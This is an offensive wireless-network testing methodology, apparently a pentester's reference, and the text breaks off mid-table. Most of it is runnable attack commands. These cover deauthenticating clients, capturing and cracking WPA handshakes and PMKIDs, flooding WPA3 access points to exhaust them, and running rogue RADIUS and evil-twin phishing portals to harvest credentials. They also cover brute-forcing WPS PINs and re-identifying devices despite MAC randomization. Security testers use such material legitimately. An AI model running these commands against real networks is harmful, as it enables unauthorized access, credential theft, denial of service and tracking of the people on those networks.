offensive-wifi

# Wireless / 802.11 — Offensive Testing Methodology

## Quick Workflow

1. Pick the right adapter (monitor mode + injection + correct band/PHY for target)
2. Recon airspace passively — never deauth before you know the topology
3. Choose attack: handshake capture, PMKID, evil twin, KARMA, or WPS
4. Crack offline; do not rely on online dictionary attacks
5. If WPA-Enterprise, pivot through stolen creds or rogue RADIUS

---

## Hardware & Adapter Selection

| Chipset | Strengths | Notes |
|---------|-----------|-------|
| Atheros AR9271 (Alfa AWUS036NHA) | Solid 2.4 GHz monitor + injection | 802.11n only |
| Realtek RTL8812AU (AWUS036ACH) | Dual-band, injection | Driver: `aircrack-ng/rtl8812au` |
| MediaTek MT7612U (AWUS036ACM) | Stable dual-band | Modern kernels in-tree |
| MediaTek MT7921AU | Wi-Fi 6 monitor (limited) | Patched drivers required |
| AWUS036AXML / AXM | Wi-Fi 6E (6 GHz) | Bleeding edge — verify per release |

```bash
# Verify monitor + injection
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo aireplay-ng --test wlan0mon
iw list | grep -A 8 "Supported interface modes"
```

---

## Reconnaissance

```bash
# Multi-channel discovery (all bands)
sudo airodump-ng wlan0mon --band abg

# Targeted on a known channel/BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon

# Hidden SSID — wait for client probe or force deauth
sudo airodump-ng -c 6 --essid-regex "." wlan0mon

# Wigle / Kismet for war-driving
kismet -c wlan0mon
```

**Key data to record:** BSSID, ESSID, channel, encryption, PMF status, client list, RSSI, vendor OUI.

---

## WPA / WPA2-PSK

### Four-way Handshake Capture

```bash
# Targeted capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Force a reconnect (deauth one client, do not blanket the AP)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
```

Verify the EAPOL frames are usable:

```bash
hcxpcapngtool -o hash.hc22000 handshake-01.cap
```

### PMKID (No Client Required)

PMKID lives in the first AP-to-station message — you can grab it without anyone connected.

```bash
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \
  --enable_status=1 --filterlist_ap=targets.txt --filtermode=2

hcxpcapngtool -o hash.hc22000 pmkid.pcapng
```

### Cracking

```bash
# GPU dictionary attack
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule

# Mask attack (e.g. carrier defaults: 10 digits)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d

# Known SSID-based defaults (e.g. UPC, Sky, BTHub generators)
upc_keys ESSID | hashcat -m 22000 hash.hc22000 -
```

---

## WPA3 / SAE

### Transition-Mode Downgrade

If the AP advertises both WPA2 and WPA3 (transition mode), force clients onto WPA2 by spoofing an RSN-only beacon and capturing as PSK.

### Dragonblood (CVE-2019-9494/9495/13377)

Side-channel and downgrade attacks on SAE. Older hostapd (<2.10) with insufficient curve diversification leaks password elements via timing/cache attacks.

```bash
# Reference implementation
git clone https://github.com/vanhoefm/dragonblood
python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF
python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon
```

### SAE Auth Flooding (Resource Exhaustion)

```bash
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024
# Triggers heavy crypto on AP CPU; can DoS lower-end deployments
```

---

## WPA-Enterprise (802.1X / EAP)

### Method Identification

```bash
# Watch initial EAP-Request/Identity to fingerprint method
tshark -i wlan0mon -Y "eapol || eap" -V
```

| Inner Method | Attack |
|--------------|--------|
| EAP-MSCHAPv2 (PEAP/TTLS) | Crack NetNTLMv1-style challenge offline |
| EAP-GTC | Cleartext password — capture via rogue RADIUS |
| EAP-TLS | Steal client cert (often in user keychain / DPAPI / NDES) |
| EAP-PWD | Dragonblood-class side channels |

### Evil-Twin RADIUS (MSCHAPv2 / GTC)

```bash
# eaphammer — automated rogue AP + RADIUS
eaphammer -i wlan0 --essid CorpWiFi --bssid AA:BB:CC:DD:EE:FF \
  --auth wpa-eap --creds

# Captured hashes → asleap or hashcat -m 5500
asleap -C challenge -R response -W wordlist.txt
```

**Critical:** organizations that don't pin server cert + CN on supplicants are vulnerable. Win10/11 with `ServerValidation` disabled (common for BYOD) will hand over creds.

### EAP-TLS Cert Theft Paths

- DPAPI master key + cert blob from user profile (`%APPDATA%\Microsoft\SystemCertificates`)
- NDES misconfig (ESC8-class cert request abuse)
- ADCS user auto-enrollment template with weak ACL

---

## WPS

### Pixie Dust (Offline)

```bash
# Capture WPS exchange
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# Or
bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon
```

Vulnerable chipsets: Ralink, Realtek, Broadcom (older firmware), MediaTek (specific revs). Pixiewps recovers PIN in seconds when nonces are predictable.

### Online PIN Brute (Last Resort)

```bash
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -L -N -d 15 -t 30 -T .5 -r 3:30
# Most modern APs lock out after a few failures — slow and noisy
```

---

## Evil Twin / KARMA / Mana

### Stock Evil Twin (Captive Portal)

```bash
# wifiphisher — automated AP + phishing portal
sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd

# airgeddon — interactive menu (good for one-off engagements)
sudo airgeddon
```

### KARMA / Mana (Probe Exploitation)

Older stations broadcast PNL (Preferred Network List) probes. KARMA replies "yes" to anything; Mana picks one realistic ESSID and answers consistently to defeat MAC randomization.

```bash
# hostapd-mana
sudo hostapd-mana ./mana.conf

# Combine with rogue RADIUS for enterprise nets
eaphammer -i wlan0 --known-beacons --known-ssids-file ssids.txt \
  --auth wpa-eap --creds --hostile-portal
```

### MAC Randomization Defeat

iOS/Android randomize MACs but leak per-SSID stable IDs. Cluster probes by sequence number and timing to re-identify devices.

---

## KRACK & FragAttacks

| Attack | Class | Target |
|--------|-----